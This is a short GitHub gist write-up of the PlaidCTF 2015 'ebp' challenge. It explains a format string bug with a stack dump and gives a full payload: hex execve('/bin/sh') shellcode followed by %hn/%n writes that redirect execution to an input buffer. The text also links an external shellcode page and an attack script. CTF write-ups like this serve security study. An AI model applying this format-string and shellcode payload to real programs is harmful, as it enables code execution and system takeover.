- To solve this program, we need to know and use format string bug.
- To explain more easliy I'll suppose aslr is turned off
-
0xffffd600: 0xf7fe76db 0x00000000 0xffffd628 0x0804852c 0xffffd610: 0xffffd648 0xf7fedee0 0xf7e6662b 0x00000000 0xffffd620: 0xf7fb9000 0xf7fb9000 0xffffd62c 0x0804a480 0xffffd630: 0x0804a080 0x00000400 0xf7fb95a0 0x00000000 0xffffd640: 0xf7fb9000 0xf7fb9000 0x00000000 0xf7e21637 0xffffd650: 0x00000001 0xffffd6e4 0xffffd6ec 0x00000000 0xffffd660: 0x00000000 0x00000000 0xf7fb9000 0xf7ffdc04 0xffffd670: 0xf7ffd000 0x00000000 0xf7fb9000 0xf7fb9000 0xffffd680: 0x00000000 0x645b8886 0x5fdcc696 0x00000000``` This is memory map, It can be differ by computer. - By
0xffffd608we can change0xffffd628and we can change any memory by0xffffd628 - In
0x0804a080, there are input so we can type shellcode in here (Also it never change so it's really eligible) - I'll use shellcode in here[http://shell-storm.org/shellcode/files/shellcode-827.php]
- So payload is like this:
(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'+'%10x'*2+'%54785c'+'%hn'+'%10x'*6+'%134467096c'+'%n'";cat) - That payload is not work when aslr is turned on. Now I'll make program to attack this
- Attack program is at here[https://github.com/parksjin01/ctf/blob/master/2015/Plaid/ebp.py]
Created
April 23, 2017 15:33
-
-
Save parksjin01/de46345593b2070aa2209dfcaef2d0a1 to your computer and use it in GitHub Desktop.
PlaidCTF 2015 writeup
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment